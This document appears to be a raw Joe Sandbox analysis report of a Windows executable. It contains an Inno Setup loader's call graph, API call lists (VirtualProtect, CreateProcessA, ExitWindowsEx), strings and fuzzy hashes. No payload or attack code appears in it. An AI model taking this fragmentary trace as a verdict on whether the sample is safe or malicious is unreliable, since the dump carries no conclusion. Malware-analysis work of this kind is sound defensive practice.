6510 409884 5 API calls 6509->6510 6511 40a1e7 6509->6511 6510->6511 6512 40a220 6511->6512 6513 4094d8 9 API calls 6511->6513 6514 40a239 6512->6514 6517 40a233 RemoveDirectoryA 6512->6517 6513->6512 6515 40a242 73A15CF0 6514->6515 6516 40a24d 6514->6516 6515->6516 6518 40a275 6516->6518 6519 40357c 4 API calls 6516->6519 6517->6514 6520 40a26b 6519->6520 6521 4025ac 4 API calls 6520->6521 6521->6518 6080 40a0e7 6081 40a0eb SetLastError 6080->6081 6112 409648 GetLastError 6081->6112 6084 40a105 6086 40a10f CreateWindowExA SetWindowLongA 6084->6086 6085 402f24 5 API calls 6085->6084 6087 405184 19 API calls 6086->6087 6088 40a192 6087->6088 6089 4032fc 4 API calls 6088->6089 6090 40a1a0 6089->6090 6091 4032fc 4 API calls 6090->6091 6092 40a1ad 6091->6092 6125 406b7c GetCommandLineA 6092->6125 6095 4032fc 4 API calls 6096 40a1c2 6095->6096 6130 4099a4 6096->6130 6099 409884 5 API calls 6100 40a1e7 6099->6100 6101 40a220 6100->6101 6102 40a207 6100->6102 6104 40a239 6101->6104 6107 40a233 RemoveDirectoryA 6101->6107 6146 4094d8 6102->6146 6105 40a242 73A15CF0 6104->6105 6106 40a24d 6104->6106 6105->6106 6108 40a275 6106->6108 6154 40357c 6106->6154 6107->6104 6110 40a26b 6111 4025ac 4 API calls 6110->6111 6111->6108 6113 404c84 19 API calls 6112->6113 6114 40968f 6113->6114 6115 407284 5 API calls 6114->6115 6116 40969f 6115->6116 6117 408da8 4 API calls 6116->6117 6118 4096b4 6117->6118 6119 405880 4 API calls 6118->6119 6120 4096c3 6119->6120 6121 4031b8 4 API calls 6120->6121 6122 4096e2 6121->6122 6123 403198 4 API calls 6122->6123 6124 4096ea 6123->6124 6124->6084 6124->6085 6126 406af0 4 API calls 6125->6126 6127 406ba1 6126->6127 6128 403198 4 API calls 6127->6128 6129 406bbf 6128->6129 6129->6095 6131 4033b4 4 API calls 6130->6131 6132 4099df 6131->6132 6133 409a11 CreateProcessA 6132->6133 6134 409a24 CloseHandle 6133->6134 6135 409a1d 6133->6135 6137 409a2d 6134->6137 6136 409648 21 API calls 6135->6136 6136->6134 6167 409978 6137->6167 6140 409a49 6141 409978 3 API calls 6140->6141 6142 409a4e GetExitCodeProcess CloseHandle 6141->6142 6143 409a6e 6142->6143 6144 403198 4 API calls 6143->6144 6145 409a76 6144->6145 6145->6099 6145->6100 6147 409532 6146->6147 6148 4094eb 6146->6148 6147->6101 6148->6147 6149 4094f3 Sleep 6148->6149 6150 409503 Sleep 6148->6150 6152 40951a GetLastError 6148->6152 6171 408fbc 6148->6171 6149->6148 6150->6148 6152->6147 6153 409524 GetLastError 6152->6153 6153->6147 6153->6148 6155 403591 6154->6155 6163 4035a0 6154->6163 6159 4035d0 6155->6159 6160 40359b 6155->6160 6162 4035b6 6155->6162 6156 4035b1 6161 403198 4 API calls 6156->6161 6157 4035b8 6158 4031b8 4 API calls 6157->6158 6158->6162 6159->6162 6165 40357c 4 API calls 6159->6165 6160->6163 6164 4035ec 6160->6164 6161->6162 6162->6110 6163->6156 6163->6157 6164->6162 6179 403554 6164->6179 6165->6159 6168 40998c PeekMessageA 6167->6168 6169 409980 TranslateMessage DispatchMessageA 6168->6169 6170 40999e MsgWaitForMultipleObjects 6168->6170 6169->6168 6170->6137 6170->6140 6172 408f70 2 API calls 6171->6172 6173 408fd2 6172->6173 6174 408fd6 6173->6174 6175 408ff2 DeleteFileA GetLastError 6173->6175 6174->6148 6176 409010 6175->6176 6177 408fac Wow64RevertWow64FsRedirection 6176->6177 6178 409018 6177->6178 6178->6148 6180 403566 6179->6180 6182 403578 6180->6182 6183 403604 6180->6183 6182->6164 6184 40357c 6183->6184 6185 4035a0 6184->6185 6189 4035d0 6184->6189 6190 40359b 6184->6190 6192 4035b6 6184->6192 6186 4035b1 6185->6186 6187 4035b8 6185->6187 6191 403198 4 API calls 6186->6191 6188 4031b8 4 API calls 6187->6188 6188->6192 6189->6192 6194 40357c 4 API calls 6189->6194 6190->6185 6193 4035ec 6190->6193 6191->6192 6192->6180 6193->6192 6195 403554 4 API calls 6193->6195 6194->6189 6195->6193 6817 402be9 RaiseException 6818 402c04 6817->6818 6528 402af2 6529 402afe 6528->6529 6532 402ed0 6529->6532 6533 403154 4 API calls 6532->6533 6535 402ee0 6533->6535 6534 402b03 6535->6534 6537 402b0c 6535->6537 6538 402b25 6537->6538 6539 402b15 RaiseException 6537->6539 6538->6534 6539->6538 6819 402dfa 6820 402e26 6819->6820 6821 402e0d 6819->6821 6823 402ba4 6821->6823 6824 402bc9 6823->6824 6825 402bad 6823->6825 6824->6820 6826 402bb5 RaiseException 6825->6826 6826->6824 6827 4075fa GetFileSize 6828 407626 6827->6828 6829 407616 GetLastError 6827->6829 6829->6828 6830 40761f 6829->6830 6831 40748c 21 API calls 6830->6831 6831->6828 6832 406ffb 6833 407008 SetErrorMode 6832->6833 6544 403a80 CloseHandle 6545 403a90 6544->6545 6546 403a91 GetLastError 6544->6546 6547 40a282 6548 40a1f4 6547->6548 6549 4094d8 9 API calls 6548->6549 6551 40a220 6548->6551 6549->6551 6550 40a239 6552 40a242 73A15CF0 6550->6552 6553 40a24d 6550->6553 6551->6550 6554 40a233 RemoveDirectoryA 6551->6554 6552->6553 6555 40a275 6553->6555 6556 40357c 4 API calls 6553->6556 6554->6550 6557 40a26b 6556->6557 6558 4025ac 4 API calls 6557->6558 6558->6555 6559 404283 6560 4042c3 6559->6560 6561 403154 4 API calls 6560->6561 6562 404323 6561->6562 6834 404185 6835 4041ff 6834->6835 6836 4041cc 6835->6836 6837 403154 4 API calls 6835->6837 6838 404323 6837->6838 6563 40a287 6564 40a290 6563->6564 6566 40a2bb 6563->6566 6573 409448 6564->6573 6568 403198 4 API calls 6566->6568 6567 40a295 6567->6566 6570 40a2b3 MessageBoxA 6567->6570 6569 40a2f3 6568->6569 6571 403198 4 API calls 6569->6571 6570->6566 6572 40a2fb 6571->6572 6574 409454 GetCurrentProcess OpenProcessToken 6573->6574 6575 4094af ExitWindowsEx 6573->6575 6576 409466 6574->6576 6577 40946a LookupPrivilegeValueA AdjustTokenPrivileges GetLastError 6574->6577 6575->6576 6576->6567 6577->6575 6577->6576 6578 403e87 6579 403e4c 6578->6579 6580 403e62 6579->6580 6581 403e7b 6579->6581 6582 403e67 6579->6582 6587 403cc8 6580->6587 6583 402674 4 API calls 6581->6583 6585 403e78 6582->6585 6591 402674 6582->6591 6583->6585 6588 403cd6 6587->6588 6589 402674 4 API calls 6588->6589 6590 403ceb 6588->6590 6589->6590 6590->6582 6592 403154 4 API calls 6591->6592 6593 40267a 6592->6593 6593->6585 6598 407e90 6599 407eb8 VirtualFree 6598->6599 6600 407e9d 6599->6600 6847 403991 6848 403983 6847->6848 6849 40374c VariantClear 6848->6849 6850 40398b 6849->6850 6851 405b92 6853 405b94 6851->6853 6852 405bd0 6856 405930 5 API calls 6852->6856 6853->6852 6854 405be7 6853->6854 6855 405bca 6853->6855 6860 404ccc 5 API calls 6854->6860 6855->6852 6857 405c3c 6855->6857 6858 405be3 6856->6858 6859 4059a0 19 API calls 6857->6859 6861 403198 4 API calls 6858->6861 6859->6858 6862 405c10 6860->6862 6863 405c76 6861->6863 6864 4059a0 19 API calls 6862->6864 6864->6858 6603 403e95 6604 403e4c 6603->6604 6605 403e67 6604->6605 6606 403e62 6604->6606 6607 403e7b 6604->6607 6610 403e78 6605->6610 6611 402674 4 API calls 6605->6611 6609 403cc8 4 API calls 6606->6609 6608 402674 4 API calls 6607->6608 6608->6610 6609->6605 6611->6610 6612 403a97 6613 403aac 6612->6613 6614 403bbc GetStdHandle 6613->6614 6615 403b0e CreateFileA 6613->6615 6625 403ab2 6613->6625 6616 403c17 GetLastError 6614->6616 6620 403bba 6614->6620 6615->6616 6617 403b2c 6615->6617 6616->6625 6619 403b3b GetFileSize 6617->6619 6617->6620 6619->6616 6622 403b4e SetFilePointer 6619->6622 6621 403be7 GetFileType 6620->6621 6620->6625 6624 403c02 CloseHandle 6621->6624 6621->6625 6622->6616 6626 403b6a ReadFile 6622->6626 6624->6625 6626->6616 6627 403b8c 6626->6627 6627->6620 6628 403b9f SetFilePointer 6627->6628 6628->6616 6629 403bb0 SetEndOfFile 6628->6629 6629->6616 6629->6620 6883 4011aa 6884 4011ac GetStdHandle 6883->6884 6222 4076ac SetEndOfFile 6223 4076c3 6222->6223 6224 4076bc 6222->6224 6225 40748c 21 API calls 6224->6225 6225->6223 6633 4028ac 6634 402594 4 API calls 6633->6634 6635 4028b6 6634->6635 6636 401ab9 6637 401a96 6636->6637 6638 401aa9 RtlDeleteCriticalSection 6637->6638 6639 401a9f RtlLeaveCriticalSection 6637->6639 6639->6638

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 116 409b30-409b54 GetSystemInfo VirtualQuery 117 409be4-409beb 116->117 118 409b5a 116->118 119 409bd9-409bde 118->119 119->117 120 409b5c-409b63 119->120 121 409bc5-409bd7 VirtualQuery 120->121 122 409b65-409b69 120->122 121->117 121->119 122->121 123 409b6b-409b73 122->123 124 409b84-409b95 VirtualProtect 123->124 125 409b75-409b78 123->125 126 409b97 124->126 127 409b99-409b9b 124->127 125->124 128 409b7a-409b7d 125->128 126->127 130 409baa-409bad 127->130 128->124 129 409b7f-409b82 128->129 129->124 129->127 131 409b9d-409ba6 call 409b28 130->131 132 409baf-409bb1 130->132 131->130 132->121 134 409bb3-409bc0 VirtualProtect 132->134 134->121
                                                                                            APIs
                                                                                            • GetSystemInfo.KERNEL32(?), ref: 00409B42
                                                                                            • VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B4D
                                                                                            • VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409B8E
                                                                                            • VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BC0
                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409BD0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Virtual$ProtectQuery$InfoSystem
                                                                                            • String ID:
                                                                                            • API String ID: 2441996862-0
                                                                                            • Opcode ID: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                                                            • Instruction ID: 3002c4020e31fcb34e6ffc2d5983d7aa910ebdc8277ab133fd4bc27d875cdae8
                                                                                            • Opcode Fuzzy Hash: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                                                            • Instruction Fuzzy Hash: F4219DB12003046BD7709AA99C85E5777E9EB85370F04082BFA89E32D3D239FC40C669
                                                                                            APIs
                                                                                            • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoLocale
                                                                                            • String ID:
                                                                                            • API String ID: 2299586839-0
                                                                                            • Opcode ID: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
                                                                                            • Instruction ID: f5e54e9283223dc3068d295e9d46a059fb55c29f9ef527c49189185961fa2cd4
                                                                                            • Opcode Fuzzy Hash: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
                                                                                            • Instruction Fuzzy Hash: 42E0927170021426D710A9A99C86AEB735CEB58310F4002BFB908E73C6EDB49E844AEE

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,?,00409C60), ref: 00404582
                                                                                            • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
                                                                                            • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
                                                                                            • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
                                                                                            • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00409C60), ref: 004045C6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$HandleModulePolicyProcess
                                                                                            • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                            • API String ID: 3256987805-3653653586
                                                                                            • Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                            • Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
                                                                                            • Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                            • Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • SetLastError.KERNEL32 ref: 0040A0F4
                                                                                              • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,02127C50), ref: 0040966C
                                                                                            • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                                                            • SetWindowLongA.USER32(00010440,000000FC,00409918), ref: 0040A148
                                                                                            • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                                                            • 73A15CF0.USER32(00010440,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLastWindow$CreateDirectoryLongRemove
                                                                                            • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                            • API String ID: 3341979996-3001827809
                                                                                            • Opcode ID: ff5240215ae095aa9b4c4a215acc78376c38d873abd9103a02ae82a1cd1baadb
                                                                                            • Instruction ID: 62af14def8aeee2ea33bef9e9495f996c0b53bf3921735d96bebdf7865f105d0
                                                                                            • Opcode Fuzzy Hash: ff5240215ae095aa9b4c4a215acc78376c38d873abd9103a02ae82a1cd1baadb
                                                                                            • Instruction Fuzzy Hash: 88412A70A00205DFD704EBA9EE86B997BA5EB45304F10427BE510BB3E2DB789801CB5D

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090C4
                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090DE
                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProc
                                                                                            • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                            • API String ID: 1646373207-2130885113
                                                                                            • Opcode ID: 155d58a6923ed0f3d568bab0c15f5a63075791531f7a431787b3bda64a379594
                                                                                            • Instruction ID: 472eec0154f0d1c01dfbc71f8259101f76790119bc09363f7f111e724705e506
                                                                                            • Opcode Fuzzy Hash: 155d58a6923ed0f3d568bab0c15f5a63075791531f7a431787b3bda64a379594
                                                                                            • Instruction Fuzzy Hash: 35015E70608342AEFB00AB729C4AB163A68E786714F60447BF5447A2D3DABD4C04CA6D

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                                                            • SetWindowLongA.USER32(00010440,000000FC,00409918), ref: 0040A148
                                                                                              • Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040A1B9,?), ref: 00406B94
                                                                                              • Part of subcall function 004099A4: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02127C50,00409A90,00000000,00409A77), ref: 00409A14
                                                                                              • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02127C50,00409A90,00000000), ref: 00409A28
                                                                                              • Part of subcall function 004099A4: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                                                              • Part of subcall function 004099A4: GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                                                              • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02127C50,00409A90), ref: 00409A5C
                                                                                            • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                                                            • 73A15CF0.USER32(00010440,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCreateHandleProcessWindow$CodeCommandDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                                            • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                            • API String ID: 978128352-3001827809
                                                                                            • Opcode ID: 3ce92308695c04860824dfce5aa5e2a114d86b56cf9c04c501a2286e8a3fa09c
                                                                                            • Instruction ID: 1dc8ba1ebca63e4a13c0cdd659cb6d357c5997a84de4409b1b672f339ad13816
                                                                                            • Opcode Fuzzy Hash: 3ce92308695c04860824dfce5aa5e2a114d86b56cf9c04c501a2286e8a3fa09c
                                                                                            • Instruction Fuzzy Hash: 75411970A04205DFD714EBA9EE85B993BA5EB88304F10427FE510B73E1DB789801CB9D

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02127C50,00409A90,00000000,00409A77), ref: 00409A14
                                                                                            • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02127C50,00409A90,00000000), ref: 00409A28
                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A41
                                                                                            • GetExitCodeProcess.KERNEL32(?,0040B240), ref: 00409A53
                                                                                            • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,02127C50,00409A90), ref: 00409A5C
                                                                                              • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,02127C50), ref: 0040966C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                                            • String ID: D
                                                                                            • API String ID: 3356880605-2746444292
                                                                                            • Opcode ID: 770d44ed1041ee64a7928381d07257c9c34427f090ab778ebb374fa24b7d9dff
                                                                                            • Instruction ID: 0d26ff0b069f05ac7fc2137d7bf6f4c2b599b29ad8a4266bf43483a79dbd8d3d
                                                                                            • Opcode Fuzzy Hash: 770d44ed1041ee64a7928381d07257c9c34427f090ab778ebb374fa24b7d9dff
                                                                                            • Instruction Fuzzy Hash: CB1142B17442486EDB10EBE68C52FAEB7ACEF49714F50017BB604F72C2DA785D048A69

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message
                                                                                            • String ID: .tmp$y@
                                                                                            • API String ID: 2030045667-2396523267
                                                                                            • Opcode ID: bee86bb55ad694e4bb8d2acfeb1616fd5571fdc195b5f8f822b6cb6c9ded53ab
                                                                                            • Instruction ID: 9654b09d82b51144a4098a2dc8db18680232f6f81bb165c1e960a0c4f18209d5
                                                                                            • Opcode Fuzzy Hash: bee86bb55ad694e4bb8d2acfeb1616fd5571fdc195b5f8f822b6cb6c9ded53ab
                                                                                            • Instruction Fuzzy Hash: 6F419F30600204DFC715EF29DE91A5A7BA6FB89304B10453AF801B73E2DB79AC01DBAD

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 00409EAB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message
                                                                                            • String ID: .tmp$y@
                                                                                            • API String ID: 2030045667-2396523267
                                                                                            • Opcode ID: 1b21aa8fed1238ce467e8651344fa0e4c36fa8da272615e6ac339cba9f98491f
                                                                                            • Instruction ID: 26cc71b999f7f6bdec311d51aeea5e314170344188b91b932b157060f98f8833
                                                                                            • Opcode Fuzzy Hash: 1b21aa8fed1238ce467e8651344fa0e4c36fa8da272615e6ac339cba9f98491f
                                                                                            • Instruction Fuzzy Hash: C5418030600204DFC715EF29DE91A5A7BA5FB49304B10453AF801B73E2CB79AC41DB9D

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
                                                                                            • GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.3291049256.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.3291022171.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291083277.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.3291106031.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                            • String ID: .tmp
                                                                                            • API String ID: 1375471231-2986845003
                                                                                            • Opcode ID: 119d404e3ccd5ff43268e8edbbf371fc1c6e95f7b1ba86c01ca6a2cdd68a72df
                                                                                            • Instruction ID: 7d66a9fb3acca2a164fab1eb31a00c007328e74e7b0c548e792a27499ccb9c3a
                                                                                            • Opcode Fuzzy Hash: 119d404e3ccd5ff43268e8edbbf371fc1c6e95f7b1ba86c01ca6a2cdd68a72df
                                                                                            • Instruction Fuzzy Hash: A1213574A002099BDB05FFA1C9429DFB7B9EF88304F50457BE901B73C2DA7C9E059AA5

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
